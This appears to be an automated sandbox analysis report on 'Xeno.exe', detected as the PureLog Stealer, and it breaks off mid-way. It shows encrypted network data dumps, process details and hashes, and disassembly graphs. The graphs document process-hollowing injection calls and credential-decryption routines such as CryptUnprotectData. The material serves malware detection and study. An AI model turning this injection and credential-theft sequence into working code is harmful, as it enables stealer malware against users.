                          Data Ascii: 47e468UvpNtj7EmV4GBtAGCw/oMjgSiICkXuwD72Vej2b641DbY50+1gAp15KOOMK7hni60JspVf2PsVdCLYdLrzK/hWfHxVOKaFnzLsNdFtamQeMJYjVNBS5Rc1JQtlZTTu9VYyOs71eVWH/Dz1Tnx8405+DbAF30j1VaMiSLslo6V8zvH2zGgiVwH7vjuZ8uhlm7YaPJLTGbPcYKjA+e04sz1YsrDBOvpZ3y1tYNS3uzNRehY
                          2025-01-15 15:16:34 UTC912INData Raw: 6a 56 70 6e 55 4e 46 4b 6c 2b 45 2b 38 36 76 6d 74 5a 38 73 30 71 64 66 7a 50 70 4b 47 63 76 43 32 33 66 6f 73 6f 38 34 2f 55 50 33 5a 52 39 46 6a 32 4b 73 6c 32 65 51 6c 64 69 32 36 55 69 52 2b 6c 54 33 34 56 38 76 30 4c 6d 4d 59 36 6d 4d 6e 48 75 36 63 4f 52 57 65 69 50 4a 62 49 37 71 4c 63 6d 68 30 62 62 34 4c 49 7a 69 58 66 6e 74 43 54 37 57 39 34 78 37 34 61 7a 49 61 4f 68 49 36 57 35 72 51 34 35 51 6b 4c 77 6d 31 36 6a 48 6d 66 74 51 30 63 39 43 31 63 64 32 47 2f 48 6c 2f 44 57 70 39 38 38 37 33 56 69 4e 46 32 42 42 35 79 2b 42 6c 48 7a 4a 6b 39 4c 62 78 32 4c 6f 35 7a 72 61 6d 6d 52 68 38 4c 50 47 54 63 79 4f 74 57 36 33 61 59 6c 58 41 6c 33 58 59 37 2f 75 50 63 6d 58 38 72 2b 41 59 50 7a 50 51 74 4f 65 61 79 32 33 7a 4e 6c 5a 2b 34 4c 50 57 37 39
                          Data Ascii: jVpnUNFKl+E+86vmtZ8s0qdfzPpKGcvC23foso84/UP3ZR9Fj2Ksl2eQldi26UiR+lT34V8v0LmMY6mMnHu6cORWeiPJbI7qLcmh0bb4LIziXfntCT7W94x74azIaOhI6W5rQ45QkLwm16jHmftQ0c9C1cd2G/Hl/DWp98873ViNF2BB5y+BlHzJk9Lbx2Lo5zrammRh8LPGTcyOtW63aYlXAl3XY7/uPcmX8r+AYPzPQtOeay23zNlZ+4LPW79
                          2025-01-15 15:16:34 UTC1369INData Raw: 33 33 31 32 0d 0a 79 56 73 5a 6c 6c 6a 4f 45 68 77 66 78 70 4e 62 6a 73 6e 7a 47 70 69 63 74 76 79 6a 50 49 53 6c 31 62 35 79 2b 49 73 51 75 4d 68 5a 47 75 31 53 4c 7a 2f 6a 58 32 39 68 4d 41 73 4e 76 67 4e 4d 71 79 69 47 33 39 64 35 4a 58 48 47 47 4a 59 73 79 4e 59 38 32 50 79 62 50 61 57 2f 47 6a 47 36 54 49 62 67 75 75 75 63 35 52 37 62 71 67 61 73 64 6d 7a 6b 4a 2f 65 2b 74 72 6e 71 67 6a 30 71 44 45 74 2b 74 35 34 72 77 33 2b 63 56 32 50 75 58 5a 39 53 71 32 39 38 31 66 30 69 75 56 61 55 39 4c 6c 48 71 32 38 6a 33 70 74 59 61 4c 32 6b 4c 4b 78 44 69 6b 34 78 41 6d 73 2f 50 34 54 38 2b 4d 6d 44 58 6a 4c 35 49 4c 59 79 62 59 52 4d 79 7a 50 64 65 56 34 73 7a 63 66 4f 4b 38 4d 61 44 38 58 47 48 4d 37 4f 78 34 78 66 61 74 50 64 52 51 6c 32 68 59 5a 64 70
                          Data Ascii: 3312yVsZlljOEhwfxpNbjsnzGpictvyjPISl1b5y+IsQuMhZGu1SLz/jX29hMAsNvgNMqyiG39d5JXHGGJYsyNY82PybPaW/GjG6TIbguuuc5R7bqgasdmzkJ/e+trnqgj0qDEt+t54rw3+cV2PuXZ9Sq2981f0iuVaU9LlHq28j3ptYaL2kLKxDik4xAms/P4T8+MmDXjL5ILYybYRMyzPdeV4szcfOK8MaD8XGHM7Ox4xfatPdRQl2hYZdp
                          2025-01-15 15:16:34 UTC1369INData Raw: 76 57 78 37 6f 6a 4b 65 38 76 78 46 4e 7a 2f 63 77 50 53 78 4e 4a 50 33 75 79 54 65 65 78 2b 32 32 77 5a 58 74 35 4e 79 4f 34 44 37 6f 57 52 76 34 42 74 37 39 55 36 2b 49 42 45 48 72 61 78 30 33 53 7a 36 4a 4e 75 36 45 66 76 52 57 39 65 35 79 2f 4a 74 41 44 4b 73 34 61 56 6c 33 2b 4f 31 7a 2b 38 69 58 59 67 30 63 62 58 55 62 75 76 6c 31 43 68 50 63 6c 6e 54 45 54 65 56 4a 43 52 4a 66 75 67 78 49 4c 6d 58 38 6a 38 49 66 58 53 62 52 71 30 2b 34 45 33 78 62 4f 77 57 74 39 6f 34 45 56 2f 5a 6f 74 35 75 6f 38 57 2f 2f 61 4d 67 4d 31 32 39 4e 52 59 32 73 52 51 44 66 50 43 2b 6d 33 44 72 71 78 65 2b 6e 54 74 47 47 4a 2b 7a 54 6d 33 36 52 37 47 6c 49 33 55 2b 31 6e 69 76 44 47 67 79 48 63 52 31 76 61 45 4e 74 76 31 76 6a 54 32 50 59 6c 4a 53 79 54 34 55 4a 32 54
                          Data Ascii: vWx7ojKe8vxFNz/cwPSxNJP3uyTeex+22wZXt5NyO4D7oWRv4Bt79U6+IBEHrax03Sz6JNu6EfvRW9e5y/JtADKs4aVl3+O1z+8iXYg0cbXUbuvl1ChPclnTETeVJCRJfugxILmX8j8IfXSbRq0+4E3xbOwWt9o4EV/Zot5uo8W//aMgM129NRY2sRQDfPC+m3Drqxe+nTtGGJ+zTm36R7GlI3U+1nivDGgyHcR1vaENtv1vjT2PYlJSyT4UJ2T
                          2025-01-15 15:16:34 UTC1369INData Raw: 47 2f 67 45 66 45 2b 77 48 32 68 45 74 75 77 4d 6e 48 65 39 4b 73 67 31 62 6f 52 66 64 42 61 45 53 4b 52 62 36 77 5a 39 71 6a 33 39 76 63 55 76 79 6a 44 37 33 30 61 44 2f 72 73 74 39 35 32 49 36 6a 65 4d 39 42 6b 52 41 43 55 38 78 6f 67 70 4d 37 6d 35 33 48 6c 63 4a 77 2b 2b 59 46 75 63 4d 55 42 4c 61 33 34 57 7a 62 68 4d 30 31 77 6c 4f 61 47 55 5a 62 69 32 47 54 6c 32 61 61 74 5a 57 69 37 6d 37 79 77 79 6a 46 78 78 38 4c 72 74 32 62 4d 38 36 68 72 47 47 36 55 76 64 4a 51 32 54 76 53 63 6d 42 49 4a 53 66 37 4e 53 62 5a 65 37 6b 43 50 69 45 46 78 2f 4e 74 38 34 79 2b 49 69 30 52 63 4e 6d 78 55 35 4f 64 74 42 30 71 70 45 62 7a 72 58 72 6b 50 78 61 37 4d 39 43 78 66 52 4c 42 74 66 41 33 54 66 30 6b 37 30 6e 31 30 4c 7a 5a 33 78 74 33 45 47 79 6f 78 62 41 36
                          Data Ascii: G/gEfE+wH2hEtuwMnHe9Ksg1boRfdBaESKRb6wZ9qj39vcUvyjD730aD/rst952I6jeM9BkRACU8xogpM7m53HlcJw++YFucMUBLa34WzbhM01wlOaGUZbi2GTl2aatZWi7m7ywyjFxx8Lrt2bM86hrGG6UvdJQ2TvScmBIJSf7NSbZe7kCPiEFx/Nt84y+Ii0RcNmxU5OdtB0qpEbzrXrkPxa7M9CxfRLBtfA3Tf0k70n10LzZ3xt3EGyoxbA6
                          2025-01-15 15:16:34 UTC1369INData Raw: 68 31 2f 38 50 70 50 5a 76 4a 74 48 33 35 32 54 42 6c 59 41 30 75 30 47 62 55 78 46 2b 2f 6c 57 52 76 77 37 42 74 64 79 31 39 6c 2f 70 6f 53 4c 6e 32 31 38 59 31 72 54 62 57 2f 4b 53 67 33 76 71 57 49 31 4b 65 48 62 44 65 70 32 4b 5a 4a 53 51 37 6f 37 32 59 2f 48 35 4c 38 79 61 59 69 37 4d 7a 65 52 34 37 50 43 51 52 63 46 76 37 78 46 4b 57 4e 6b 35 6c 76 4a 6e 69 4f 72 39 67 73 4e 38 30 38 55 4a 76 6f 59 56 4c 37 62 64 6d 30 79 31 38 72 56 68 30 69 75 62 61 42 77 38 2b 6a 4f 76 76 7a 48 33 6a 38 2b 78 33 31 37 5a 31 68 7a 4c 38 47 34 44 39 75 2f 69 5a 73 2b 69 6f 45 36 39 55 63 74 73 54 45 2f 4a 54 61 6a 6f 59 38 43 77 30 59 2f 48 57 4e 4c 37 50 65 54 6d 51 41 50 64 72 6f 4a 47 35 6f 43 30 57 63 78 56 38 56 64 4e 65 64 5a 57 6f 72 45 79 79 75 6d 4f 67 5a
                          Data Ascii: h1/8PpPZvJtH352TBlYA0u0GbUxF+/lWRvw7Btdy19l/poSLn218Y1rTbW/KSg3vqWI1KeHbDep2KZJSQ7o72Y/H5L8yaYi7MzeR47PCQRcFv7xFKWNk5lvJniOr9gsN808UJvoYVL7bdm0y18rVh0iubaBw8+jOvvzH3j8+x317Z1hzL8G4D9u/iZs+ioE69UctsTE/JTajoY8Cw0Y/HWNL7PeTmQAPdroJG5oC0WcxV8VdNedZWorEyyumOgZ
                          2025-01-15 15:16:34 UTC1369INData Raw: 58 4e 66 57 56 79 4b 33 39 64 74 6b 38 5a 47 44 5a 65 68 58 79 48 59 62 52 76 4e 30 6f 59 77 57 30 4a 48 59 68 4a 74 7a 36 64 46 65 39 75 46 6e 49 50 50 32 2f 45 7a 31 6b 73 4e 57 75 6e 50 33 52 45 30 6d 32 55 36 31 69 77 58 77 6a 2f 32 74 78 46 44 62 32 44 2f 74 33 57 63 31 35 37 4b 66 4f 65 61 74 75 33 6a 50 51 4a 74 34 65 46 76 2f 53 4a 65 70 4e 59 69 64 78 70 62 38 5a 4d 33 72 50 2b 76 69 45 77 50 50 39 63 31 4d 78 36 71 65 54 73 4a 43 69 57 78 44 4c 2f 35 6a 75 62 77 78 32 62 37 57 76 34 42 69 37 74 41 6c 78 74 78 2b 4c 65 62 62 33 45 65 78 6c 36 42 4b 34 48 50 70 54 48 4e 64 31 47 58 49 34 52 4c 42 71 50 32 45 36 55 7a 36 36 68 2f 67 78 57 67 51 75 4d 44 38 63 76 69 54 6c 58 58 55 59 75 31 69 52 45 4c 74 53 71 75 52 48 4f 79 76 6a 5a 66 64 52 34 66
                          Data Ascii: XNfWVyK39dtk8ZGDZehXyHYbRvN0oYwW0JHYhJtz6dFe9uFnIPP2/Ez1ksNWunP3RE0m2U61iwXwj/2txFDb2D/t3Wc157KfOeatu3jPQJt4eFv/SJepNYidxpb8ZM3rP+viEwPP9c1Mx6qeTsJCiWxDL/5jubwx2b7Wv4Bi7tAlxtx+Lebb3Eexl6BK4HPpTHNd1GXI4RLBqP2E6Uz66h/gxWgQuMD8cviTlXXUYu1iRELtSquRHOyvjZfdR4f
                          2025-01-15 15:16:34 UTC1369INData Raw: 32 30 52 38 37 48 58 62 63 6d 4c 6c 45 48 72 55 35 42 77 5a 57 66 63 62 61 4f 67 45 50 6d 70 33 62 54 67 66 63 33 58 4f 62 6e 43 56 57 66 32 78 38 4e 76 34 50 53 75 56 64 63 38 77 57 31 2b 63 39 6f 77 6a 66 49 75 7a 5a 32 4d 6b 50 68 56 68 2f 6b 33 2b 65 4d 52 50 38 75 34 35 47 72 6e 73 62 5a 38 79 6b 72 36 5a 45 52 4c 6c 46 71 4e 72 52 6e 54 6a 76 6d 79 34 43 43 4c 70 42 33 6d 68 48 38 31 36 4e 50 48 65 63 33 36 30 55 2f 4e 4d 70 41 5a 47 32 58 61 59 73 36 4b 62 35 4f 56 38 4b 37 67 49 4d 37 57 4c 39 72 7a 55 69 48 6e 74 73 78 32 36 4c 65 32 55 4b 46 4a 78 68 6c 4f 5a 50 5a 68 72 4c 55 68 6c 35 75 4c 74 4a 35 4f 37 39 41 50 2f 2f 68 70 42 37 6e 55 35 47 58 75 73 73 4a 47 36 33 58 52 55 6c 4e 76 35 79 2b 56 34 53 66 4e 6f 63 65 45 35 32 37 79 32 54 32 34
                          Data Ascii: 20R87HXbcmLlEHrU5BwZWfcbaOgEPmp3bTgfc3XObnCVWf2x8Nv4PSuVdc8wW1+c9owjfIuzZ2MkPhVh/k3+eMRP8u45GrnsbZ8ykr6ZERLlFqNrRnTjvmy4CCLpB3mhH816NPHec360U/NMpAZG2XaYs6Kb5OV8K7gIM7WL9rzUiHntsx26Le2UKFJxhlOZPZhrLUhl5uLtJ5O79AP//hpB7nU5GXussJG63XRUlNv5y+V4SfNoceE527y2T24
                          2025-01-15 15:16:34 UTC1369INData Raw: 54 54 2f 45 37 78 70 62 68 6a 75 6b 62 2b 44 32 70 34 77 31 61 43 6b 53 36 56 37 4d 69 7a 35 6d 4c 76 2b 31 6e 31 31 31 49 61 2b 39 32 62 58 61 32 4a 75 31 72 73 52 75 6c 72 53 46 44 74 5a 38 72 70 4f 76 71 4f 32 49 54 6e 4c 50 58 35 4b 39 66 34 51 42 76 7a 37 49 77 35 36 2f 71 35 52 4f 52 4b 69 52 42 54 52 2b 63 76 77 37 49 56 39 61 72 79 67 63 4e 53 36 50 38 39 35 4f 68 50 49 2f 6a 43 7a 6d 6a 47 71 38 31 57 2b 48 44 74 59 55 31 46 39 69 76 4c 74 6d 48 4b 68 5a 48 55 35 6e 4c 50 36 53 50 39 32 32 67 2f 75 66 4c 42 56 50 47 55 71 58 58 63 59 2b 6b 54 41 6c 76 79 62 37 53 61 49 38 32 67 6a 74 66 35 4a 66 66 48 57 38 58 62 56 44 58 64 72 6f 78 54 71 59 69 33 50 2b 4e 4a 6b 45 35 54 63 6f 35 52 75 59 4d 78 36 5a 48 63 6b 63 6c 2f 7a 65 41 73 75 2b 30 4a 5a
                          Data Ascii: TT/E7xpbhjukb+D2p4w1aCkS6V7Miz5mLv+1n111Ia+92bXa2Ju1rsRulrSFDtZ8rpOvqO2ITnLPX5K9f4QBvz7Iw56/q5RORKiRBTR+cvw7IV9arygcNS6P895OhPI/jCzmjGq81W+HDtYU1F9ivLtmHKhZHU5nLP6SP922g/ufLBVPGUqXXcY+kTAlvyb7SaI82gjtf5JffHW8XbVDXdroxTqYi3P+NJkE5Tco5RuYMx6ZHckcl/zeAsu+0JZ


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:10:16:06
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\Xeno.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Xeno.exe"
                          Imagebase:0xb90000
                          File size:455'792 bytes
                          MD5 hash:1E5F4EE4303AA49C9C32E89132C7B4F9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:1
                          Start time:10:16:06
                          Start date:15/01/2025
                          Path:C:\Users\user\Desktop\Xeno.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Xeno.exe"
                          Imagebase:0x770000
                          File size:455'792 bytes
                          MD5 hash:1E5F4EE4303AA49C9C32E89132C7B4F9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:4
                          Start time:10:16:06
                          Start date:15/01/2025
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 924
                          Imagebase:0xae0000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:14.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:21.9%
                            Total number of Nodes:32
                            Total number of Limit Nodes:3
                            execution_graph 1857 2f980be 1858 2f980d8 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 1857->1858 1859 2f9817f WriteProcessMemory 1858->1859 1863 2f98087 GetPEB 1858->1863 1860 2f981c4 1859->1860 1861 2f981c9 WriteProcessMemory 1860->1861 1862 2f98206 WriteProcessMemory Wow64SetThreadContext ResumeThread 1860->1862 1861->1860 1863->1858 1865 1230b88 1869 1230ba4 1865->1869 1866 1230ceb 1869->1866 1871 1230ac0 1869->1871 1872 1230ad0 1871->1872 1873 1230b44 1871->1873 1872->1873 1874 1230ac0 3 API calls 1872->1874 1877 12327c8 1873->1877 1875 1230d03 1874->1875 1876 12327c8 3 API calls 1875->1876 1876->1873 1885 12327c8 2 API calls 1877->1885 1886 1232880 1877->1886 1878 1232801 1883 123283c 1878->1883 1892 1232104 1878->1892 1880 1232b1b VirtualProtect 1881 1232b58 1880->1881 1881->1866 1882 123284b 1882->1866 1883->1880 1883->1882 1885->1878 1887 12328a6 1886->1887 1891 12328b0 1886->1891 1887->1878 1888 1232b1b VirtualProtect 1889 1232b58 1888->1889 1889->1878 1890 1232aaa 1890->1878 1891->1888 1891->1890 1893 1232ad0 VirtualProtect 1892->1893 1895 1232b58 1893->1895 1895->1883

                            Executed Functions

                            Function 02F97F41 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294threadinjectionmemoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F97EB3,02F97EA3), ref: 02F980D9
                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F980EC
                            • Wow64GetThreadContext.KERNEL32(000000D4,00000000), ref: 02F9810A
                            • ReadProcessMemory.KERNELBASE(00000368,?,02F97EF7,00000004,00000000), ref: 02F9812E
                            • VirtualAllocEx.KERNELBASE(00000368,?,?,00003000,00000040), ref: 02F98159
                            • WriteProcessMemory.KERNELBASE(00000368,00000000,?,?,00000000,?), ref: 02F981B1
                            • WriteProcessMemory.KERNELBASE(00000368,00400000,?,?,00000000,?,00000028), ref: 02F981FC
                            • WriteProcessMemory.KERNELBASE(00000368,?,?,00000004,00000000), ref: 02F9823A
                            • Wow64SetThreadContext.KERNEL32(000000D4,05420000), ref: 02F98276
                            • ResumeThread.KERNELBASE(000000D4), ref: 02F98285
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1847615635.0000000002F97000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F97000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2f97000_Xeno.jbxd
                            Similarity
                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                            • String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                            • API String ID: 2687962208-232383841
                            • Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                            • Instruction ID: a06400a0cc72d8ced2af2b4d31d49f2cb7c0277a706cb220a6d985f1d1a78235
                            • Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                            • Instruction Fuzzy Hash: B8B1077660064AAFDB60CF68CC80BDAB3A5FF88754F158524EA0CAB341D774FA51CB94
                            Function 02F980BE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82threadinjectionmemoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F97EB3,02F97EA3), ref: 02F980D9
                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F980EC
                            • Wow64GetThreadContext.KERNEL32(000000D4,00000000), ref: 02F9810A
                            • ReadProcessMemory.KERNELBASE(00000368,?,02F97EF7,00000004,00000000), ref: 02F9812E
                            • VirtualAllocEx.KERNELBASE(00000368,?,?,00003000,00000040), ref: 02F98159
                            • WriteProcessMemory.KERNELBASE(00000368,00000000,?,?,00000000,?), ref: 02F981B1
                            • WriteProcessMemory.KERNELBASE(00000368,00400000,?,?,00000000,?,00000028), ref: 02F981FC
                            • WriteProcessMemory.KERNELBASE(00000368,?,?,00000004,00000000), ref: 02F9823A
                            • Wow64SetThreadContext.KERNEL32(000000D4,05420000), ref: 02F98276
                            • ResumeThread.KERNELBASE(000000D4), ref: 02F98285
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1847615635.0000000002F97000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F97000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2f97000_Xeno.jbxd
                            Similarity
                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                            • String ID: TerminateProcess
                            • API String ID: 2687962208-2873147277
                            • Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                            • Instruction ID: d443cfc02ea76a1cb132c8e11901e369be1e1441e32d671285fe027a44f1a313
                            • Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                            • Instruction Fuzzy Hash: DA312D72340646ABEB34CF54CC91FEA7365BFC8B55F148508EB09AF280C6B4BA058B94
                            Function 01232880 Relevance: 1.7, APIs: 1, Instructions: 243COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 36 1232880-12328a4 37 12328b0-12328d5 36->37 38 12328a6-12328ad 36->38 41 12328d8-12328eb 37->41 43 12328f1-12328fc 41->43 44 1232ab4-1232b56 VirtualProtect 41->44 43->44 45 1232902-123290d 43->45 53 1232b58 44->53 54 1232b5d-1232b71 44->54 45->44 47 1232913-1232921 45->47 47->41 49 1232923-123292b 47->49 50 123292e-123293a 49->50 50->44 52 1232940-123294a 50->52 52->44 55 1232950-123295c 52->55 53->54 56 1232965-123296e 55->56 57 123295e-1232964 55->57 56->44 58 1232974-123297f 56->58 57->56 58->44 59 1232985-1232994 58->59 59->44 60 123299a-12329a8 59->60 60->50 61 12329aa-12329b9 60->61 62 1232aaa-1232ab1 61->62 63 12329bf 61->63 64 12329ca-12329e5 63->64 65 12329e7-12329f3 64->65 66 1232a2b-1232a41 64->66 67 12329f5-12329fb 65->67 68 12329fc-1232a05 65->68 74 1232a46-1232a4f 66->74 67->68 68->66 70 1232a07-1232a12 68->70 70->66 71 1232a14-1232a23 70->71 71->66 73 1232a25-1232a29 71->73 73->74 74->44 76 1232a51-1232a5f 74->76 76->44 77 1232a61-1232a6e 76->77 78 1232a70-1232a77 77->78 79 1232a78-1232a81 77->79 78->79 79->44 80 1232a83-1232a90 79->80 80->44 81 1232a92-1232aa4 80->81 81->62 81->63
                            Memory Dump Source
                            • Source File: 00000000.00000002.1846566171.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1230000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43cdd4c1440f795780423a7f42d42dd52cf31de1b6da795ef2df546c6fe1f5fd
                            • Instruction ID: db71740351598e4b3829e13a77485b1e54ed804801c70ca2b634950664fa4072
                            • Opcode Fuzzy Hash: 43cdd4c1440f795780423a7f42d42dd52cf31de1b6da795ef2df546c6fe1f5fd
                            • Instruction Fuzzy Hash: 33A12AB1910259DFCB15CFA9D480AEDFBF1BF88314F28C659E459A7312C330A881CBA4
                            Function 01232104 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 82 1232104-1232b56 VirtualProtect 85 1232b58 82->85 86 1232b5d-1232b71 82->86 85->86
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01232B49
                            Memory Dump Source
                            • Source File: 00000000.00000002.1846566171.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1230000_Xeno.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: f47cd7405952a5c3f3747e4c75f77d8818d5dd29e5e0866498ce96032633929d
                            • Instruction ID: 5c3e54b6dca9a98df98d7386868d7b304a431ea8309847b0e589fa7db74264e2
                            • Opcode Fuzzy Hash: f47cd7405952a5c3f3747e4c75f77d8818d5dd29e5e0866498ce96032633929d
                            • Instruction Fuzzy Hash: 3221E0B5910619EFCB00DF9AD884ADEFBB4FB49314F10812AE918A7200D374A954CFA5

                            Execution Graph

                            Execution Coverage:8.3%
                            Dynamic/Decrypted Code Coverage:5.7%
                            Signature Coverage:66.4%
                            Total number of Nodes:298
                            Total number of Limit Nodes:16
                            execution_graph 13810 434843 13813 413bd0 13810->13813 13812 434848 CoSetProxyBlanket 13813->13812 13944 422a00 13945 422a02 13944->13945 13947 422a0a 13945->13947 13948 43e7c0 LdrInitializeThunk 13945->13948 13948->13945 13814 43e740 13815 43e787 13814->13815 13816 43e794 13814->13816 13817 43e79b RtlReAllocateHeap 13814->13817 13818 43e75a 13814->13818 13819 43e768 13814->13819 13820 43e782 13814->13820 13826 43d0c0 13815->13826 13816->13817 13817->13820 13818->13815 13818->13816 13818->13817 13818->13819 13818->13820 13823 43d0a0 13819->13823 13830 43fdf0 13823->13830 13825 43d0aa RtlAllocateHeap 13825->13820 13827 43d0d3 13826->13827 13828 43d0d5 13826->13828 13827->13820 13829 43d0da RtlFreeHeap 13828->13829 13829->13820 13831 43fe10 13830->13831 13831->13825 13831->13831 13832 42d647 13833 42d670 13832->13833 13834 42d6fe 13833->13834 13836 43e7c0 LdrInitializeThunk 13833->13836 13836->13834 13949 414c04 13950 414c09 13949->13950 13956 414c3e 13950->13956 13959 43e7c0 LdrInitializeThunk 13950->13959 13952 414eeb 13957 415166 13952->13957 13960 418700 13952->13960 13954 414eb3 CryptUnprotectData 13954->13952 13954->13957 13955 415226 13956->13952 13956->13954 13957->13955 13957->13957 13958 4419e0 LdrInitializeThunk 13957->13958 13958->13957 13959->13956 13961 418723 13960->13961 13963 41873e 13960->13963 13961->13963 13998 43e7c0 LdrInitializeThunk 13961->13998 13964 4187ee 13963->13964 13999 43e7c0 LdrInitializeThunk 13963->13999 13965 41884e 13964->13965 13990 418b02 13964->13990 14000 43e7c0 LdrInitializeThunk 13964->14000 13967 43d0a0 RtlAllocateHeap 13965->13967 13976 418939 13965->13976 13971 4188a9 13967->13971 13969 4188de 13970 43d0c0 RtlFreeHeap 13969->13970 13970->13976 13971->13969 14001 43e7c0 LdrInitializeThunk 13971->14001 13974 418b75 FreeLibrary 13975 418ad3 13974->13975 13974->13990 13975->13990 14003 43e7c0 LdrInitializeThunk 13975->14003 13976->13974 13976->13975 13977 418ace 13976->13977 13976->13990 14002 43e7c0 LdrInitializeThunk 13976->14002 13977->13974 13979 418b2c 13979->13974 13980 418b33 FreeLibrary 13979->13980 13981 418bdc 13980->13981 13982 418b4a 13980->13982 13981->13981 13984 43d0a0 RtlAllocateHeap 13981->13984 13981->13990 13985 418b68 13982->13985 14004 43e7c0 LdrInitializeThunk 13982->14004 13989 418ccd 13984->13989 13985->13981 14005 43e7c0 LdrInitializeThunk 13985->14005 13987 418cfc 13988 43d0c0 RtlFreeHeap 13987->13988 13988->13990 13989->13987 14006 43e7c0 LdrInitializeThunk 13989->14006 13990->13957 13994 43d0a0 RtlAllocateHeap 13997 418d25 13994->13997 13995 43d0c0 RtlFreeHeap 13995->13997 13996 43e7c0 LdrInitializeThunk 13996->13997 13997->13987 13997->13994 13997->13995 13997->13996 14007 43d340 13997->14007 14011 43d420 13997->14011 13998->13963 13999->13964 14000->13965 14001->13969 14002->13979 14003->13990 14004->13985 14005->13981 14006->13997 14008 43d3be 14007->14008 14009 43d34d 14007->14009 14008->13997 14009->14008 14015 43e7c0 LdrInitializeThunk 14009->14015 14012 43d44e 14011->14012 14013 43d426 14011->14013 14012->13997 14013->14012 14016 43e7c0 LdrInitializeThunk 14013->14016 14015->14008 14016->14012 14017 43e98b 14018 43e9a0 14017->14018 14018->14018 14019 43ea70 GetForegroundWindow 14018->14019 14020 43ea7f 14019->14020 14026 40d190 14028 40d19c 14026->14028 14029 40d1b4 14026->14029 14027 40d1fe 14044 4240a0 14027->14044 14028->14029 14080 43e7c0 LdrInitializeThunk 14028->14080 14029->14027 14081 43e7c0 LdrInitializeThunk 14029->14081 14033 40d23e 14052 427090 14033->14052 14041 40d2d9 14042 435030 6 API calls 14041->14042 14043 40d302 14042->14043 14045 4240f0 14044->14045 14045->14045 14046 42411d RtlExpandEnvironmentStrings 14045->14046 14048 424170 14046->14048 14047 42420d 14047->14033 14048->14047 14049 4241e8 RtlExpandEnvironmentStrings 14048->14049 14050 42422e 14048->14050 14049->14047 14049->14050 14050->14050 14082 4419e0 14050->14082 14053 4270b0 14052->14053 14054 42712e 14053->14054 14087 43e7c0 LdrInitializeThunk 14053->14087 14055 40d2a7 14054->14055 14057 43d0a0 RtlAllocateHeap 14054->14057 14062 4273c0 14055->14062 14059 4271aa 14057->14059 14058 43d0c0 RtlFreeHeap 14058->14055 14061 42721e 14059->14061 14088 